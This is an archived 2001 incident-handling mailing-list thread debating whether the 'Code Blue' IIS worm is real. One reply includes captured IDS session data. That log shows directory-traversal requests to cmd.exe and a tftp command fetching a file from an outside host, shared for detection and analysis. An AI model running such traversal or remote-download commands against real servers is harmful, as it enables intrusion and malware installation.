RE: Any one seen any evidence of "Code Blue?"

["Patrick Belcher, Monitored Security" <pat.belcher () monitoredsecurity com>]

Actually, Code Blue is in the wild, and has been seen both in the UK and
the US.  At this point, our SOC has only seen probes and attempts to
infect, but we have not yet seen any successful attacks as yet.  This
may be because this worm targets the unicode vulnerability rather than a
newer and unpatched vulnerability.  
Also, its scanning ability seems very slow and does not cross many
netblocks as yet, but we do have confirmation that it is indeed
beginning to bleed over into other networks.  Right now all source
attacks have been from the APNIC area of the world.
Below is a copy of session data captured by a Dragon IDS.  Within the
data you will see the unique directory traversal attempt with the multi
dot-dot and the tftp attempt to download the httpext.dll file which may
be the vbs script that launches the scan.

GET /{A}
/............/winnt/system32/cmd.exe?/c+dir{D}{A}
GET /{A}
/............/winnt/system32/cmd.exe?/c+dir{D}{A}
{A}
HTTP/1.1 200 OK{D}{A}
Server: Microsoft-IIS/5.0{D}{A}
Date: Tue, 11 Sep 2001 15:08:05 GMT{D}{A}
{D}{A}
< html > {D}{A}
< head > {D}{A}
var currentImage ="menu0";{D}{A}
{D}{A}
if (document.images) {{D}{A}
{D}{A}
menu0Off = new Image();{D}{A}
menu0Off.src = path + "";{D}{A}
menu0Hi = new Image();{D}{A}
menu0Hi.src = path + ""; {D}{A}
{9}{9}{D}{A}
{9}{9}menu1Off = new Image();{D}{A}
{D}{A}
< html > {D}{A}
< head > {D}{A}
< title > 
{D}{A}
GET /{A}
/............/winnt/system32/cmd.exe?/c+tftp+-i+165.194.27.107+get+httpe
xt.dll{D}{A}
GET /{A}
/............/winnt/system32/cmd.exe?/c+tftp+-i+165.194.27.107+get+httpe
xt.dll{D}{A}
{A}
HTTP/1.1 200 OK{D}{A}
Server: Microsoft-IIS/5.0{D}{A}
Date: Tue, 11 Sep 2001 15:08:09 GMT{D}{A}


The whois information for the IP that hosts the httpext.dll is Korean-
Chungang University (NET-CAU-NET)
   Chungang University Computing Center
   Huksok-dong 221, Tongjak-ku, Seoul, 156-756
   KR



-----Original Message-----
From: Nick FitzGerald [mailto:nick () virus-l demon co uk]
Sent: Wednesday, September 12, 2001 3:57 PM
To: Lists - incidents
Subject: Re: Any one seen any evidence of "Code Blue?"


Michael Katz <mike () responsible com> wrote:

> Why have I not seen anything on this list about the "Code Blue" worm?
...

Because it is hype and does not exist in the wild, or if it does, it 
is so buggy/flawed that it is effectively non-viable in "real world" 
infestations.

> ...  I 
> have received some alerts and news stories about a "Code Blue" worm:

Ignore the hype -- here are some real facts:

1.  CodeRed.C (aka CodeRedII) had compromised perhaps 200,000 
machines within less than 12 hours of its release.  That is, it 
(almost) saturated the population of non-patched, Internet-accessible 
IIS machines in about half the time CodeRed.B did (although CodeRed.B 
hit more machines total because news of its earlier spread alerted 
some system admins to patch their potentially vulnerable machines).

2.  In the days following CodeRed.C's release, I regularly captured
samples with a trivial "worm catcher" (netcat listening on port 80)
in less than an hour of going on-line with a dial-up connection.  I
did this consistently from a United Airlines lounge in Chicago, on
several different ISPs in Los Angeles, 2 or 3 different ISPs in
Dallas, again back in LA and have consistently caught around 100
CodeRed.C and CodeRed.D samples per day since returning to New
Zealand (pro-rated for hours on-line).

3.  I caught one of the first samples of CodeRed.D and apparently did
so within a few hours of its release.  I now see dozens and dozens a
day -- roughly half of my daily CodeRed catches are the .D variant.  
Thus, I would expect to have seen at least one sample of something 
that is "worse than CodeRed" as CodeRed.D spreads about the same or 
slightly less successfully than CodeRed.C.

4.  CodeBlue (aka BlueCode) is repeatedly said to be "potentially
much worse" than CodeRed.C with "the potential to spread much
faster".  Some (snake-oilers) drop the "potentially" when repeating 
those claims about this reputed new "super worm"...

5.  It is now 5 (? 6??) days since CodeBlue was reputedly released
yet my "worm catcher" (I've been using something more sophisticated
than the netcat-based one since returning to LA from Dallas and 
before returning home) has not caught a single sample of CodeBlue.

6.  Despite claims (by the snake-oilers) that CodeBlue is rampant -- 
and thus should be "killing" huge numbers of CodeReds *and* be
"inoculating" those machines from further CodeRed (re-)infestation -- 
neither my worm catcher nor any of the others in the network of worm 
catchers it is part of has seen any CodeBlue *and* those worm 
catchers are still seeing similar levels of CodeRed.C and .D each 
day.  In fact, the CodeRed capture rate has remained fairly 
consistent with that seen prior to the first mention of BlueCode.

My conclusion -- CodeBlue is vendor snake-oil and/or media hype.

[To the journalists who will write asking for a quote if this is 
posted to the list, you may  use "CodeBlue is vendor snake-oil and/or 
media hype" without seeking further quoting permission.]


Regards,

Nick FitzGerald

------------------------------------------------------------------------
----
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com